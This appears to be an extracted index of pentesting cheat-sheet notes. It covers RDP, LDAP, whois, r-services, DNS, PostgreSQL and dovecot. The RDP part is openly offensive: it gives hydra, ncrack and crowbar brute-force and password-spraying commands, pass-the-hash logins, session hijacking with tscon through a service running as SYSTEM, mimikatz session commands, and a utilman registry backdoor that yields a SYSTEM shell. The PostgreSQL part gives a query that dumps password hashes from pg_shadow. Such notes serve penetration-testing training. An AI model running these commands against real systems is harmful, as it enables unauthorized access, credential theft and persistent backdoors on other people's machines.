RDP works at the application layer in the TCP/IP reference model, typically utilizing TCP port 3389 as the transport protocol. However, port 3389 can also be used for remote administration over the connectionless UDP protocol. The Remote Desktop service is installed by default on Windows servers and does not require additional external applications. This service can be activated using the Server Manager and comes with the default setting of allowing connections to the service only from hosts with Network Level Authentication (NLA).

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#enumeration","title":"Enumeration","text":"

The following scan checks the available encryption methods and the DoS vulnerability (without causing a DoS to the service) and obtains NTLM Windows info (versions).

nmap uses RDP cookies (mstshash=nmap) to interact with the RDP server. These cookies can be identified by security services such as EDRs and can get us locked out, so we need to think twice before running this scan.

    nmap -Pn -sV -p3389 --script rdp-*  $ip\n

    Results:

    PORT     STATE SERVICE       VERSION\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-enum-encryption:\n|   Security layer\n|     CredSSP (NLA): SUCCESS\n|     CredSSP with Early User Auth: SUCCESS\n|_    RDSTLS: SUCCESS\n| rdp-ntlm-info:\n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2022-11-11T12:16:26+00:00\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n

    rdp-sec-check.pl is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services).

    git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check\n\n./rdp-sec-check.pl $ip\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connection-with-rdp","title":"Connection with rdp","text":"

    To run Microsoft\u2019s Remote Desktop Protocol (RDP) client, a command-line interface called Microsoft Terminal Services Client (MSTSC) is used. We can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina and interact with the GUI of the server accordingly.

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#xfreerdp","title":"xfreerdp","text":"

    See xfreerdp.

We can first try to form an RDP session with the target by not providing any additional information for any switches other than the target IP address. This makes xfreerdp use your own username as the login username for the RDP session, thus testing guest login capabilities.

    xfreerdp /v:$ip\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

Try to log in with other default accounts, such as user, admin, Administrator, and so on. We will also specify that all security certificate requirements should be ignored so that the client does not prompt us about them:

xfreerdp /cert:ignore /u:Administrator /v:$ip\n# /cert:ignore : Specifies that all security certificate usage should be ignored.\n# /u:Administrator : Specifies the login username to be \"Administrator\".\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

If successful, during the initialization of the RDP session, we will be asked for a password. We can hit Enter to see if the process continues without one. Sometimes there are severe configuration mishaps like this, and we can gain access.

    If you know user and credentials:

    xfreerdp /u:<username> /p:<\"password\"> /v:$ip \n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#brute-force","title":"Brute force","text":"

    ncrack -vv --user <User> -P pwds.txt rdp://$ip\n\nhydra -V -f -L <userslist> -P <passwlist> rdp://$ip\n\nhydra -L user.list -P password.list rdp://$ip\n
Be careful: you could lock out accounts.

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#password-spraying","title":"Password Spraying","text":"

Be careful: you could lock out accounts.

    # https://github.com/galkan/crowbar\ncrowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'\n\n# hydra\nhydra -L usernames.txt -p 'password123' 192.168.2.143 rdp\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connect-with-known-credentialshash","title":"Connect with known credentials/hash","text":"
    rdesktop -u <username> $ip\nrdesktop -d <domain> -u <username> -p <password> $ip\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip #Pass the hash\n

    Check known credentials against RDP services

rdp_check.py from impacket lets you check whether given credentials are valid for an RDP service:

    rdp_check <domain>/<name>:<password>@$ip\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#attacks","title":"Attacks","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#session-stealing","title":"Session stealing","text":"

With SYSTEM permissions, you can access any open RDP session of any user without needing to know the owner's password.

List open sessions:

    query user\n

Access the selected session:

    tscon <ID> /dest:<SESSIONNAME>\n

Now you will be inside the selected RDP session, having impersonated the user using only Windows tools and features.

Important: when you take over an active RDP session, you will kick off the user that was using it. You could also get passwords by dumping the session's processes, but this method is much faster and lets you interact with the user's virtual desktops (passwords left in notepad without being saved to disk, other RDP sessions opened to other machines, and so on).
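
If you are a local administrator but not yet SYSTEM, a common trick is to have a service run tscon for you, since services run as SYSTEM. A sketch, where the session ID 2, the session name rdp-tcp#0, and the service name sesshijack are placeholders taken from the query user output:

# Identify the target session ID and your own session name\nquery user\n\n# Create and start a service that attaches session 2 to your own session (here rdp-tcp#0)\nsc create sesshijack binpath= \"cmd.exe /k tscon 2 /dest:rdp-tcp#0\"\nnet start sesshijack\n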

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#mimikatz","title":"Mimikatz","text":"

    You could also use mimikatz to do this:

    ts::sessions #Get sessions\nts::remote /id:2 #Connect to the session\n

Sticky Keys & Utilman: combining this technique with sticky keys or utilman, you will be able to access an administrative CMD and any RDP session anytime.
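
As an illustration of the utilman variant (a sketch; requires administrative privileges to set the registry key), after planting the following backdoor, pressing Win+U at the logon screen spawns cmd.exe as SYSTEM:

REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\"\n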

    You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-process-injection","title":"RDP Process Injection","text":"

If someone from a different domain, or with better privileges, logs in via RDP to a PC where you are an Admin, you can inject your beacon into their RDP session process and act as them:

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-sessions-abuse","title":"RDP Sessions Abuse","text":"
    # Adding User to RDP group\nnet localgroup \"Remote Desktop Users\" UserLoginName /add\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#shadow-attack","title":"Shadow Attack","text":"

    AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

    https://github.com/JoelGMSec/AutoRDPwn

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"389-636-ldap/","title":"389 - 636 LDAP","text":"

Application protocol used for accessing, modifying and querying distributed directory information services (such as Active Directory) over a TCP/Internet Protocol (IP) network. A directory service is a database-like virtual storage that holds data in a specific hierarchical structure. The LDAP structure is based on a tree of directory entries.

Lightweight Directory Access Protocol (LDAP) is an integral part of Active Directory (AD). It is an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over a TCP/IP network.

LDAP runs on port 389 (unencrypted connections) and port 636 (LDAP over SSL).

    The relationship between AD and LDAP can be compared to Apache and HTTP. The same way Apache is a web server that uses the HTTP protocol, Active Directory is a directory server that uses the LDAP protocol. While uncommon, you may come across organizations while performing an assessment that does not have AD but does have LDAP, meaning that they most likely use another type of LDAP server such as OpenLDAP.

    • TCP and UDP port 389 and 636.
    • It's a binary protocol and by default not encrypted.
• Has been updated to include encryption add-ons, such as Transport Layer Security (TLS)/SSL, and can be tunnelled through SSH.

    The hierarchy (tree) of information stored via LDAP is known as the Directory Information Tree (DIT). That structure is defined in a schema.

    A common use of LDAP is to provide a central place to store usernames and passwords. This allows many different applications and services to connect to the LDAP server to validate users.

    The latest LDAP specification is Version 3, which is published as RFC 4511. AD stores user account information and security information such as passwords and facilitates sharing this information with other devices on the network. LDAP is the language that applications use to communicate with other servers that also provide directory services. In other words, LDAP is a way that systems in the network environment can \"speak\" to AD.

    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ad-ldap-authentication","title":"AD LDAP Authentication","text":"

    LDAP is set up to authenticate credentials against AD using a \"BIND\" operation to set the authentication state for an LDAP session. There are two types of LDAP authentication.

    1. Simple Authentication: This includes anonymous authentication, unauthenticated authentication, and username/password authentication. Simple authentication means that a username and password create a BIND request to authenticate to the LDAP server.

    2. SASL Authentication: The Simple Authentication and Security Layer (SASL) framework uses other authentication services, such as Kerberos, to bind to the LDAP server and then uses this authentication service (Kerberos in this example) to authenticate to LDAP. The LDAP server uses the LDAP protocol to send an LDAP message to the authorization service which initiates a series of challenge/response messages resulting in either successful or unsuccessful authentication. SASL can provide further security due to the separation of authentication methods from application protocols.

    LDAP authentication messages are sent in cleartext by default so anyone can sniff out LDAP messages on the internal network. It is recommended to use TLS encryption or similar to safeguard this information in transit.
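
From Linux, an anonymous simple BIND can be tested with ldapsearch; a minimal sketch querying the root DSE for the base naming contexts:

ldapsearch -x -H ldap://$ip -s base -b '' namingcontexts\n# -x: simple authentication (anonymous here, since no -D/-w are supplied)\n# -s base -b '': query the root DSE\n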

    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldif-file","title":"LDIF file","text":"

    Example of a LDIF file:

    dn: dc=example,dc=com\nobjectclass: top\nobjectclass: domain\ndc: example\n\ndn: ou=People, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: People\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: uid=jgibbs, ou=People, dc=example,dc=com\nuid: jgibbs\ncn: Joshamee Gibbs\nsn: Gibbs\ngivenname: Joshamee\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\nmail: jgibbs@blackpearl.com\ntelephonenumber: +1 408 555 1234\nfacsimiletelephonenumber: +1 408 555 4321\nuserpassword: supersecret\n\ndn: uid=hbarbossa, ou=People, dc=example,dc=com\nuid: hbarbossa\ncn: Hector Barbossa\nsn: Barbossa\ngivenname: Hector\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: Brethren Court\nmail: captain.barbossa@example.com\ntelephonenumber: +421 910 382734\nfacsimiletelephonenumber: +1 408 555 1111\nroomnumber: 111\nuserpassword: deadjack\n\n# Note:\n# Lord Bectett is an exception to the cn = givenName + sn rule\n\ndn: uid=jbeckett, ou=People, dc=example,dc=com\nuid: jbeckett\ncn: Lord Cutler Beckett\nsn: Beckett\ngivenname: Cutler\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: East India Trading Co.\nmail: bigboss@eitc.com\ntelephonenumber: +421 910 382333\nfacsimiletelephonenumber: +1 408 555 2222\nroomnumber: 666\nuserpassword: takeovertheworld\n\ndn: ou=Groups, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Groups\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: cn=Pirates,ou=groups,dc=example,dc=com\nobjectclass: top\nobjectclass: groupOfUniqueNames\ncn: Pirates\nou: groups\nuniquemember: uid=jgibbs, ou=People, dc=example,dc=com\nuniquemember: uid=barbossa, ou=People, dc=example,dc=com\ndescription: Arrrrr!\n\ndn: ou=Administrators, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Administrators\n\ndn: uid=idm, ou=Administrators,dc=example,dc=com\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nuid: idm\ncn: IDM Administrator\nsn: IDM Administrator\ndescription: Special LDAP acccount used by the IDM\n  to access the LDAP data.\nou: Administrators\nuserPassword: secret\nds-privilege-name: unindexed-search\n

LDAP operators:

• = : Equal to
• | : Logical OR
• ! : Logical NOT
• & : Logical AND
• * : Wildcard, any string or character

Example: any surname starting with "a" or canonical name starting with "b":

    (|(sn=a*)(cn=b*))\n
    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-ldapfilter","title":"LDAP queries: LDAPFilter","text":"

    By combining the \"Get-ADObject\" cmdlet with the \"LDAPFilter\" parameter in powershell we can perform some ldap queries via powershell.

    Get-ADObject -LDAPFilter <FILTER> | select cn\n

    Some useful LDAPFilters:

Computers:

• Find All Workstations : '(objectCategory=computer)'
• Find All Domain Controllers : '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'

Users and contacts:

• Find All Users : '(&(objectCategory=person)(objectClass=user))'
• Find All Contacts : '(objectClass=contact)'
• Find All Users and Contacts : '(objectClass=user)'
• List Disabled Users : '(userAccountControl:1.2.840.113556.1.4.803:=2)'

Groups:

• Find All Groups : '(objectClass=group)'
• Find direct members of a Security Group : '(memberOf=CN=Admin,OU=Security,DC=DOM,DC=NT)'
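
For example, to list all disabled users with the filter from the table above (a sketch run from a domain-joined PowerShell session with the ActiveDirectory module loaded):

Get-ADObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select cn\n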

    More:

    • LDAP Queries related to AD computers
    • LDAP queries related to AD users.
    • LDAP queries related to AD groups.
    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-search-filters","title":"LDAP queries: Search Filters","text":"

    The LDAPFilter parameter with the same cmdlets lets us use LDAP search filters when searching for information.

    Operators:

    • & -> and
    • | -> or
    • ! -> not

    AND Operation:

• Two criteria: (& (..C1..) (..C2..))
    • More than two criteria: (& (..C1..) (..C2..) (..C3..))

    OR Operation:

• Two criteria: (| (..C1..) (..C2..))
    • More than two criteria: (| (..C1..) (..C2..) (..C3..))
    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#filters","title":"Filters","text":"Criteria Rule Example Equal to (attribute=123) (&(objectclass=user)(displayName=Smith) Not equal to (!(attribute=123)) !objectClass=group) Present (attribute=*) (department=*) Not present (!(attribute=*)) (!homeDirectory=*) Greater than (attribute>=123) (maxStorage=100000) Less than (attribute<=123) (maxStorage<=100000) Approximate match (attribute~=123) (sAMAccountName~=Jason) Wildcards (attribute=*A) (givenName=*Sam)","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#exploiting-vulndap","title":"Exploiting vuLnDAP","text":"

    https://github.com/digininja/vuLnDAP

The full schema available for querying is documented at https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html

    Examples:

    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"43-whois/","title":"Port 43 - whois","text":"

    It is a TCP-based transaction-oriented query/response protocol listening on TCP port 43 by default. We can use it for querying databases containing domain names, IP addresses, or autonomous systems and provide information services to Internet users.

The Internet Corporation for Assigned Names and Numbers (ICANN) requires that accredited registrars enter the holder's contact information, the domain's creation and expiration dates, and other information in the Whois database immediately after registering a domain. In simple terms, the Whois database is a searchable list of all domains currently registered worldwide.

    Sysinternals WHOIS for Windows or Linux WHOIS command-line utility are our preferred tools for gathering information. However, there are some online versions like whois.domaintools.com we can also use.

    # linux\nwhois $TARGET\n\n# windows\nwhois.exe $TARGET\n
    ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"512-513-514-r-services/","title":"512 r services","text":"

    R-services span across the ports 512, 513, and 514 and are only accessible through a suite of programs known as r-commands. R-Services are a suite of services hosted to enable remote access or issue commands between Unix hosts over TCP/IP.

R-services were the de facto standard for remote access between Unix operating systems until they were replaced by the Secure Shell (SSH) protocols and commands due to the inherent security flaws built into them. They are most commonly found on commercial operating systems such as Solaris, HP-UX, and AIX. While less common nowadays, we do run into them from time to time.

    The R-commands suite consists of the following programs:

    • rcp (remote copy)
    • rexec (remote execution)
    • rlogin (remote login)
    • rsh (remote shell)
    • rstat
    • ruptime
    • rwho (remote who).

    These are the most frequently abused commands:

• rcp (daemon rshd, port 514/TCP): Copy a file or directory bidirectionally from the local system to the remote system (or vice versa) or from one remote system to another. It works like the cp command on Linux but provides no warning to the user for overwriting existing files on a system.
• rsh (daemon rshd, port 514/TCP): Opens a shell on a remote machine without a login procedure. Relies upon the trusted entries in the /etc/hosts.equiv and .rhosts files for validation.
• rexec (daemon rexecd, port 512/TCP): Enables a user to run shell commands on a remote machine. Requires authentication through the use of a username and password through an unencrypted network socket. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files.
• rlogin (daemon rlogind, port 513/TCP): Enables a user to log in to a remote host over the network. It works similarly to telnet but can only connect to Unix-like hosts. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files.

    The /etc/hosts.equiv file contains a list of trusted hosts and is used to grant access to other systems on the network.

    "},{"location":"512-513-514-r-services/#footprinting-r-services","title":"Footprinting r-services","text":"
    sudo nmap -sV -p 512,513,514 $ip\n

Even though these services utilize Pluggable Authentication Modules (PAM) for user authentication onto a remote system by default, they can also bypass this authentication through the use of the /etc/hosts.equiv and .rhosts files on the system.

    If any misconfiguration exists on those files, we could get access to those services.

    # Example of a misconfiguration in rhosts file:\n\nhtb-student     10.0.17.5\n+               10.0.17.10\n+               +\n\n# The file follows the specific syntax of `<username> <ip address>` or `<username> <hostname>` pairs. Additionally, the `+` modifier can be used within these files as a wildcard to specify anything. In this example, the `+` modifier allows any external user to access r-commands from the `htb-student` user account via the host with the IP address `10.0.17.10`.\n
    "},{"location":"512-513-514-r-services/#accessing-the-service","title":"Accessing the service","text":"
    # Login \nrlogin $ip -l <username>\n\n# list all interactive sessions on the local network by sending requests to the UDP port 513\nrwho\n\n#  detailed account of all logged-in users over the network, including information such as the username, hostname of the accessed machine, TTY that the user is logged in to, the date and time the user logged in, the amount of time since the user typed on the keyboard, and the remote host they logged in from (if applicable).\nrusers -al $ip\n
    "},{"location":"53-dns/","title":"Port 53 - Domain Name Server (DNS)","text":"

    Globally distributed DNS servers translate domain names into IP addresses and thus control which server a user can reach via a particular domain. There are several types of DNS servers that are used worldwide:

• DNS Root Server : Root servers of DNS are responsible for the top-level domains (TLD). As the last instance, they are only requested if the name server does not respond. The ICANN coordinates the work of the root name servers. There are 13 such root servers around the globe.
• Authoritative Nameserver : Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point.
• Non-authoritative Nameserver : Non-authoritative name servers are not responsible for a particular DNS zone. Instead, they collect information on specific DNS zones themselves, which is done using recursive or iterative DNS querying.
• Caching DNS Server : Caching DNS servers cache information from other name servers for a specified period. The authoritative name server determines the duration of this storage.
• Forwarding Server : Forwarding servers perform only one function: they forward DNS queries to another DNS server.
• Resolver : Resolvers are not authoritative DNS servers but perform name resolution locally in the computer or router.
","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#resource-records","title":"Resource records","text":"

    A resource record is a four-tuple that contains the following 4 fields:

    (Name, Value, Type, TTL)\n
    • A records: If Type=A, then Name is a hostname and Value is the IP address for that name. We recognize the IP addresses that point to a specific (sub)domain through the A record. Example:
    (relay1.bar.example.com, 145.222.36.125, A)\n
    • MX records: If Type=MX, then Value is the canonical name of a mail server that has an alias hostname Name. The mail server records show us which mail server is responsible for managing the emails for the company. Example:

      (example.com,mail.bar.example.com,MX)\n

    • NS records: If Type=NS, then Name is a domain (such as example.com) and Value is the name of an authoritative DNS server that knows how to obtain the IP address for hosts in the domain. These kinds of records show which name servers are used to resolve the FQDN to IP addresses. Most hosting providers use their own name servers, making it easier to identify the hosting provider. Example:

      (example.com,dns.example.com,NS)\n

    • CNAME records: If Type=CNAME, then Value is a canonical hostname for the alias hostname Name. Example:

      (example.com,relay1.bar.example.com,CNAME)\n

    • TXT records: this type of record often contains verification keys for different third-party providers and other security aspects of DNS, such as SPF, DMARC, and DKIM, which are responsible for verifying and confirming the origin of the emails sent. Here we can already see some valuable information if we look closer at the results.

    • AAAA records: Returns an IPv6 address of the requested domain.
    • PTR record: The PTR (Pointer) record works the other way around (reverse lookup). It converts IP addresses into valid domain names. For the IP address to be resolved from the Fully Qualified Domain Name (FQDN), the DNS server must have a reverse lookup file. In this file, the computer name (FQDN) is assigned to the last octet of an IP address, which corresponds to the respective host, using a PTR record. The PTR records are responsible for the reverse translation of IP addresses into names.
    • SOA records: (Start Of Authority (SOA)). It should be first in a zone file because it indicates the start of a zone. Each zone can only have one SOA record, and additionally, it contains the zone's values, such as a serial number and multiple expiration timeouts. Provides information about the corresponding DNS zone and email address of the administrative contact. The SOA record is located in a domain's zone file and specifies who is responsible for the operation of the domain and how DNS information for the domain is managed.


    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#security","title":"Security","text":"

DNS is mainly unencrypted. Devices on the local WLAN and Internet providers can therefore intercept and spy on DNS queries. Since this poses a privacy risk, there are now some solutions for DNS encryption. By default, IT security professionals apply DNS over TLS (DoT) or DNS over HTTPS (DoH) here. In addition, the network protocol DNSCrypt also encrypts the traffic between the computer and the name server.

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#ips-to-add-to-etcresolvconf","title":"IPs to add to etc/resolv.conf","text":"

    1.1.1.1 is a public DNS resolver operated by Cloudflare that offers a fast and private way to browse the Internet. Unlike most DNS resolvers, 1.1.1.1 does not sell user data to advertisers. In addition, 1.1.1.1 has been measured to be the fastest DNS resolver available.

    See DNS enumeration

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-transfer-zones","title":"DNS transfer zones","text":"

    See dig axfr.

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-server","title":"DNS server","text":"

    There are many different configuration types for DNS. All DNS servers work with three different types of configuration files:

    1. local DNS configuration files
    2. zone files
    3. reverse name resolution files

    The DNS server Bind9 is very often used on Linux-based distributions. Its local configuration file (named.conf) is roughly divided into two sections, firstly the options section for general settings and secondly the zone entries for the individual domains. The local configuration files are usually:

    • /etc/bind/named.conf.local
    • /etc/bind/named.conf.options
    • /etc/bind/named.conf.log

In the file /etc/bind/named.conf.local we can define the different zones. A zone file is a text file that describes a DNS zone with the BIND file format; in other words, it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software.

A zone file describes a zone completely. There must be precisely one SOA record and at least one NS record. The SOA resource record is usually located at the beginning of a zone file. The main goal of these global rules is to improve the readability of zone files. A syntax error usually results in the entire zone file being considered unusable; the name server then behaves as if this zone did not exist and responds to DNS queries with a SERVFAIL error message.

    DNS misconfigurations and vulnerabilities.

• allow-query : Defines which hosts are allowed to send requests to the DNS server.
• allow-recursion : Defines which hosts are allowed to send recursive requests to the DNS server.
• allow-transfer : Defines which hosts are allowed to receive zone transfers from the DNS server.
• zone-statistics : Collects statistical data of zones.

    A list of vulnerabilities targeting the BIND9 server can be found at CVEdetails. In addition, SecurityTrails provides a short list of the most popular attacks on DNS servers.

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#footprinting-dns","title":"Footprinting DNS","text":"

    See nslookup.

    # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

    See dig.

# Querying: A Records for a Subdomain\ndig a www.example.com @$ip\n# here, $ip refers to the IP of the DNS server\n\n# Get email of the administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# ns: other known name servers are listed in NS records\n# the `@` character specifies the DNS server we want to query\n\n# View all available records\ndig any example.com @$ip\n# The more recent RFC8482 specified that `ANY` DNS requests be abolished. Therefore, we may not receive a response to our `ANY` request from the DNS server.\n\n# Display version: query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind @$ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n

    Transfer a zone (more on dig axfr)

    dig axfr example.htb @$ip\n

If the administrator used a subnet for the allow-transfer option for testing purposes or as a workaround solution, or set it to any, anyone would be able to query the entire zone file from the DNS server.

Other tools for transferring zones:

    Fierce:

# Attempt a DNS zone transfer (and brute force subdomains) against domain.com\nfierce -dns domain.com\n

    dnsenum:

    dnsenum domain.com\n# additionally it performs DNS brute force with /usr/share/dnsenum/dns.txt.\n
    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#subdomain-brute-enumeration","title":"Subdomain brute enumeration","text":"

    Using Sec wordlist:

    for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
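
The same brute force can be run with gobuster's dns mode (a sketch; the wordlist path may differ on your system):

gobuster dns -d example.com -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt\n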
    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-passive-enumeration","title":"Tools for passive enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. DNSRecon Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. dnsdumpster.com DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-active-enumeration","title":"Tools for active enumeration","text":"Tool + Cheat sheet What it does dnsenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. dig discover non-contiguous ip blocks. fierce DNS scanner that helps locate non-contiguous IP space and hostnames. dnscan Python wordlist-based DNS subdomain scanner. gobuster For brute force enumerations. nslookup . amass In depth DNS Enumeration and network mapping.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"5432-postgresql/","title":"5432 postgreSQL","text":"

    https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql.

    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#description","title":"Description","text":"

The service that typically runs on TCP port 5432 is PostgreSQL, a database management system used for creating, modifying, and updating databases, changing and adding data, and more. PostgreSQL is usually interacted with via the command-line tool psql.

    psql\n
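
A connection sketch against a remote instance, assuming the default port and the built-in postgres role:

# Connect to a remote PostgreSQL instance; you will be prompted for the password\npsql -h $ip -p 5432 -U postgres\n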
    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#installation","title":"Installation","text":"","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#linux","title":"Linux","text":"

    If the tool is not installed, then run:

    sudo apt install postgresql-client-common\n

If your user is not in the sudoers file, there are a few workarounds. Some options:

• uploading static binaries onto the target machine
• port-forwarding or tunneling using SSH

    Using SSH and postgresql:

    1. In the attacking machine:

ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We listen for incoming connections on our local port 1234. When a client connects to it, the SSH client forwards the connection through the tunnel to port 5432 on the remote server. This lets the local client reach the remote PostgreSQL service as if it were running on the local machine.\n# In other words, we forward traffic from a local port of our choosing, here 1234, to the port PostgreSQL is listening on, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and the target port 5432 to the right.\n

    2. In another terminal in the attacking machine:

    sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#powershell","title":"Powershell","text":"
    Install-Module PostgreSQLCmdlets\n
    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#basics-commands-in-postgresql","title":"Basics commands in postgresql","text":"
# List databases\n# Short version: \l\n\list\n\n# Connect to a database\n# Short version: \c NameOfDatabase\n\connect NameOfDatabase\n\n# List database tables (once you have selected a database)\n\dt\n\n# Dump the contents of a table\nSELECT * FROM NameOfTable;\n# Watch out! Case sensitive\n
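
If the connected role has superuser rights, password hashes can be read straight from the pg_shadow catalog (a sketch; run the query inside psql):

# Dump usernames and password hashes (requires superuser privileges)\nSELECT usename, passwd FROM pg_shadow;\n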
    ","tags":["postgresql","port 5432"]},{"location":"55007-55008-dovecot/","title":"55007 - 55008 dovecot","text":"","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#dovecot","title":"dovecot","text":"

You can connect to a dovecot server using the telnet protocol.

    telnet IP port\n# Example: telnet 192.168.56.101 55007\n
